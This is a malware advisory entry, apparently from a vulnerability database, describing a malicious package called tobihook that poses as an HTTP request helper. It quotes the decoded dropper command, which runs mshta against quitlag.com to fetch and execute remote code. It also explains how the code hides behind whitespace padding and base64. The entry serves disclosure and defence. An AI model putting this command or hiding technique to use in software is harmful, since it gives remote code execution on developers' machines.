MAL-2026-5995

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb) The package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/__init__.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/__init__.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host.